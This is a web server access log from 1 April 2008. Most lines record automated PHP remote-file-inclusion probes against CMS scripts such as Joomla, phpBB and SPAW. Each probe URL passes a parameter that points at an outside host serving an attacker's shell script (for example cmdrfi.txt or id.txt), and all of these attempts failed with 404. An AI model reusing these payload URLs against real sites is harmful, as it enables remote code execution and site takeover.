66.7.207.158 - - [01/Apr/2008:06:50:40 -0700] "GET /logs/access_080131.log//admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.207.158 - - [01/Apr/2008:06:50:40 -0700] "GET //admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.207.158 - - [01/Apr/2008:06:50:40 -0700] "GET /logs//admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.77.224.171 - - [01/Apr/2008:06:50:55 -0700] "GET //skins/advanced/advanced2.php?pluginpath[0]=http://tompakovcapital.com/.dat/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.31.175 - - [01/Apr/2008:06:51:38 -0700] "GET /wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.geocities.com/bangke77/cmdrfi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.22.89 - - [01/Apr/2008:06:51:45 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.29.36 - - [01/Apr/2008:06:51:47 -0700] "GET /bikes/dteel/2008_02_16/Arryo_Seco/?N=A HTTP/1.0" 200 8427 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
88.151.103.27 - - [01/Apr/2008:06:53:27 -0700] "GET /logs/access_080313.log/modulescjaycontentadmineditor2spaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.159.200.63 - - [01/Apr/2008:06:53:30 -0700] "GET /logs/ HTTP/1.1" 200 41264 "-" "Mozilla/5.0 (X11; U; Linux x86_64; rv:1.8.1.12)" "dmulk.com"
89.159.200.63 - - [01/Apr/2008:06:53:31 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; rv:1.8.1.12)" "dmulk.com"
89.159.200.63 - - [01/Apr/2008:06:53:32 -0700] "GET /logs/access.log HTTP/1.1" 200 176778 "http://dmulk.com/logs/" "Mozilla/5.0 (X11; U; Linux x86_64; rv:1.8.1.12)" "dmulk.com"
209.67.223.188 - - [01/Apr/2008:06:53:32 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.67.223.188 - - [01/Apr/2008:06:53:32 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.67.223.188 - - [01/Apr/2008:06:53:32 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.67.223.188 - - [01/Apr/2008:06:53:32 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.67.223.188 - - [01/Apr/2008:06:53:32 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.67.223.188 - - [01/Apr/2008:06:53:32 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.67.223.188 - - [01/Apr/2008:06:53:32 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.67.223.188 - - [01/Apr/2008:06:53:32 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.67.223.188 - - [01/Apr/2008:06:53:33 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.67.223.188 - - [01/Apr/2008:06:53:33 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.67.223.188 - - [01/Apr/2008:06:53:33 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.67.223.188 - - [01/Apr/2008:06:53:33 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.67.223.188 - - [01/Apr/2008:06:53:33 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.67.223.188 - - [01/Apr/2008:06:53:33 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.67.223.188 - - [01/Apr/2008:06:53:33 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.67.223.188 - - [01/Apr/2008:06:53:33 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.67.223.188 - - [01/Apr/2008:06:53:33 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.67.223.188 - - [01/Apr/2008:06:53:33 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.77.224.171 - - [01/Apr/2008:06:53:46 -0700] "GET /logs/access.log//skins/advanced/advanced2.php?pluginpath[0]=http://tompakovcapital.com/.dat/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.77.224.171 - - [01/Apr/2008:06:53:47 -0700] "GET /logs//skins/advanced/advanced2.php?pluginpath[0]=http://tompakovcapital.com/.dat/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.79.239.236 - - [01/Apr/2008:06:53:58 -0700] "GET //crontab/run_billing.php?config[include_dir]=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
208.79.239.236 - - [01/Apr/2008:06:53:58 -0700] "GET /logs//crontab/run_billing.php?config[include_dir]=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
209.67.223.188 - - [01/Apr/2008:06:54:18 -0700] "GET /logs/access_080306.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.67.223.188 - - [01/Apr/2008:06:54:18 -0700] "GET /logs/access_080306.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.67.223.188 - - [01/Apr/2008:06:54:18 -0700] "GET /logs/access_080306.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.67.223.188 - - [01/Apr/2008:06:54:22 -0700] "GET /logs/access_080306.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.67.223.188 - - [01/Apr/2008:06:54:25 -0700] "GET /logs/access_080306.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.67.223.188 - - [01/Apr/2008:06:54:26 -0700] "GET /logs/access_080306.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.2.130 - - [01/Apr/2008:06:55:33 -0700] "GET /logs/access.log/index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.2.130 - - [01/Apr/2008:06:55:33 -0700] "GET /logs/index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:06:55:45 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.archfuck.ru/administrator/components/com_remository/zell.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:06:55:45 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.archfuck.ru/administrator/components/com_remository/zell.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:06:55:46 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.archfuck.ru/administrator/components/com_remository/zell.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [01/Apr/2008:06:55:56 -0700] "GET /templatesmangoberyfooter.sample.php?Site_Path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.93.48.162 - - [01/Apr/2008:06:56:26 -0700] "GET /templatesmangoberyfooter.sample.php?Site_Path=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [01/Apr/2008:06:56:27 -0700] "GET /templatesmangoberyfooter.sample.php?Site_Path=ftp://84.32.137.157/incoming/upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
216.246.77.203 - - [01/Apr/2008:06:57:27 -0700] "GET /logs/access_080119.log//components/com_simpleboard/file_upload.php?sbp=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.77.203 - - [01/Apr/2008:06:57:27 -0700] "GET //components/com_simpleboard/file_upload.php?sbp=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.77.203 - - [01/Apr/2008:06:57:27 -0700] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:06:57:42 -0700] "GET /logs/access_080313.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.archfuck.ru/administrator/components/com_remository/zell.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.77.203 - - [01/Apr/2008:06:58:23 -0700] "GET /logs/access_080207.log//newspublish/include.php?path%5Bdocroot%5D=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.77.203 - - [01/Apr/2008:06:58:23 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.77.203 - - [01/Apr/2008:06:58:23 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.154.47 - - [01/Apr/2008:06:58:49 -0700] "GET /index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://www.kingwild.com/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.2.130 - - [01/Apr/2008:06:59:00 -0700] "GET /logs/access_080219.log/index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.236.47.176 - - [01/Apr/2008:07:00:26 -0700] "GET /logs/access_080106.log//components/com_simpleboard/file_upload.php?sbp=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.97.211.97 - - [01/Apr/2008:07:00:41 -0700] "GET //tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
89.97.211.97 - - [01/Apr/2008:07:00:41 -0700] "GET /logs//tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
216.246.77.203 - - [01/Apr/2008:07:01:00 -0700] "GET /logs/access_080305.log//newspublish/include.php?path%5Bdocroot%5D=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.26.84 - - [01/Apr/2008:07:01:03 -0700] "GET /logs/access.log/templatesmangoberyfooter.sample.php?Site_Path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [01/Apr/2008:07:01:04 -0700] "GET /logs/templatesmangoberyfooter.sample.php?Site_Path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.2.130 - - [01/Apr/2008:07:01:07 -0700] "GET /administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.151.162.98 - - [01/Apr/2008:07:01:32 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.84.20.85 - - [01/Apr/2008:07:03:06 -0700] "GET /logs/access_080305.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.84.20.85 - - [01/Apr/2008:07:03:06 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.84.20.85 - - [01/Apr/2008:07:03:06 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.159.63.144 - - [01/Apr/2008:07:03:18 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ikazlevhalari.com/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.190.1.171 - - [01/Apr/2008:07:03:22 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.65.34.76 - - [01/Apr/2008:07:03:52 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.solheimsimport.no/shop/images/can?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.65.34.76 - - [01/Apr/2008:07:03:53 -0700] "GET //skin/zero_vote/error.php?dir=http://www.solheimsimport.no/shop/images/can?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.65.34.76 - - [01/Apr/2008:07:03:53 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.solheimsimport.no/shop/images/can?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.195.52.99 - - [01/Apr/2008:07:04:04 -0700] "GET /?M=D HTTP/1.0" 200 3346 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.84.20.85 - - [01/Apr/2008:07:04:16 -0700] "GET /logs/access_080225.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.234.21.89 - - [01/Apr/2008:07:04:50 -0700] "GET /logs/access_080118.log/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.234.21.89 - - [01/Apr/2008:07:04:51 -0700] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.234.21.89 - - [01/Apr/2008:07:04:51 -0700] "GET /logs/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.67.26.84 - - [01/Apr/2008:07:04:55 -0700] "GET /logs/access_080131.log/modulescjaycontentadmineditor2spaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [01/Apr/2008:07:04:55 -0700] "GET /modulescjaycontentadmineditor2spaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [01/Apr/2008:07:04:55 -0700] "GET /logs/modulescjaycontentadmineditor2spaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [01/Apr/2008:07:05:54 -0700] "GET /logs/access_080112.log/templatesmangoberyfooter.sample.php?Site_Path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.2.130 - - [01/Apr/2008:07:06:53 -0700] "GET /logs/access_071230.log/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.2.130 - - [01/Apr/2008:07:06:53 -0700] "GET /logs/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.65.34.76 - - [01/Apr/2008:07:07:19 -0700] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.solheimsimport.no/shop/images/can?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.157.174.120 - - [01/Apr/2008:07:07:44 -0700] "GET /logs/access_080215.log/index.php?go1=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.157.174.120 - - [01/Apr/2008:07:07:44 -0700] "GET /logs/index.php?go1=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.157.174.120 - - [01/Apr/2008:07:07:45 -0700] "GET /logs/access_080225.log/index.php?go1=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.17.166 - - [01/Apr/2008:07:08:15 -0700] "GET /logs/access_080124.log HTTP/1.0" 200 713220 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
212.77.224.171 - - [01/Apr/2008:07:08:20 -0700] "GET //skins/advanced/advanced2.php?pluginpath[0]=http://tompakovcapital.com/.dat/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.2.130 - - [01/Apr/2008:07:08:38 -0700] "GET /logs/access_080218.log/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [01/Apr/2008:07:09:26 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.atlant.ru/sms/img/images.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [01/Apr/2008:07:09:38 -0700] "GET //include/functions_common.php?gl_root_path=http://www.atlant.ru/sms/img/images.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.107.122 - - [01/Apr/2008:07:10:41 -0700] "GET /logs/access.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.107.122 - - [01/Apr/2008:07:10:41 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.107.122 - - [01/Apr/2008:07:10:41 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.107.122 - - [01/Apr/2008:07:10:41 -0700] "GET /logs/access_080312.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.18.207.65 - - [01/Apr/2008:07:11:39 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.atlant.ru/sms/img/images.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.8.92 - - [01/Apr/2008:07:11:50 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.26.34 - - [01/Apr/2008:07:11:51 -0700] "GET /logs/access_071217.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.29.81.87 - - [01/Apr/2008:07:12:00 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.81.87 - - [01/Apr/2008:07:12:08 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.169.145.28 - - [01/Apr/2008:07:12:24 -0700] "GET /logs/index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=www.trosken.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
81.169.145.28 - - [01/Apr/2008:07:12:24 -0700] "GET /index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=www.trosken.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
87.118.102.153 - - [01/Apr/2008:07:13:34 -0700] "GET /logs/index.php?option=com_cpg&Itemid=&mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
87.118.102.153 - - [01/Apr/2008:07:13:34 -0700] "GET /index.php?option=com_cpg&Itemid=&mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
85.159.63.144 - - [01/Apr/2008:07:14:05 -0700] "GET /logs/access_080131.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ikazlevhalari.com/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.159.63.144 - - [01/Apr/2008:07:14:06 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ikazlevhalari.com/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.77.224.171 - - [01/Apr/2008:07:14:23 -0700] "GET /logs/access.log//skins/advanced/advanced2.php?pluginpath[0]=http://tompakovcapital.com/.dat/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.77.224.171 - - [01/Apr/2008:07:14:24 -0700] "GET /logs//skins/advanced/advanced2.php?pluginpath[0]=http://tompakovcapital.com/.dat/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.118.81.182 - - [01/Apr/2008:07:14:30 -0700] "GET /logs/access_080219.log//language/lang_english/lang_main_album.php?phpbb_root_path=http://www.geocities.com/bangke77/cmdrfi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.89.31.175 - - [01/Apr/2008:07:14:41 -0700] "GET /logs/access_080313.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.geocities.com/bangke77/cmdrfi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.89.31.175 - - [01/Apr/2008:07:14:41 -0700] "GET /logs/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.geocities.com/bangke77/cmdrfi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
